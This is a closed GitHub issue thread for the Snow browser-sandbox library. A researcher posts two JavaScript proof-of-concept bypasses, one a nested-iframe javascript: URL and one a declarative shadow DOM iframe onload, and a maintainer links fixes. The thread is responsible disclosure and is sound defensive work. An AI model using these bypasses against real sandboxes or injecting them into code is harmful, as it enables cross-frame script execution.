Closed arxenix closed 1 year ago
Turns out that you don't need a shadow DOM at all for this. Simply:
```js
// Nested iframe: the outer srcdoc carries an inner iframe whose src is a javascript: URL
const f = document.createElement('iframe');
f.srcdoc = '<iframe src="javascript:alert(document.domain)"></iframe>';
document.body.appendChild(f);
```
Declarative shadow DOM might be a separate issue though, because you can still use it to prevent Snow from stripping onload attributes (#32):
```js
const f = document.createElement('iframe');
// works for both open and closed shadowroot
f.srcdoc = `
<my-element>
  <template id="x" shadowroot="closed">
    <b>In Template & ShadowDOM</b>
    <iframe onload="this.contentWindow.alert.call(top, top.origin)"></iframe>
  </template>
</my-element>
`;
document.body.appendChild(f);
```
Awesome catch, I honestly have never heard of declarative shadow DOMs before this. For now the solution would be to block declarative shadow DOMs when they are injected this way; visit #46 to learn more about this decision.
Regarding your other catch, which doesn't involve declarative shadow DOMs at all (and is unrelated to this issue), #48 should fix it.
If disallowing usage of declarative shadow DOMs the way Snow does (https://github.com/LavaMoat/snow/issues/44#issuecomment-1369686014) prevents your application from running correctly, please share so in this issue thread so we can discuss the problem and understand how to best deal with it.
You can create a shadow DOM via the `<template>` tag's `shadowroot` attribute in Chrome; this is called the declarative shadow DOM: https://web.dev/declarative-shadow-dom/

Declarative shadow DOM is processed and attached when the document is loaded, so we use it in an iframe srcdoc.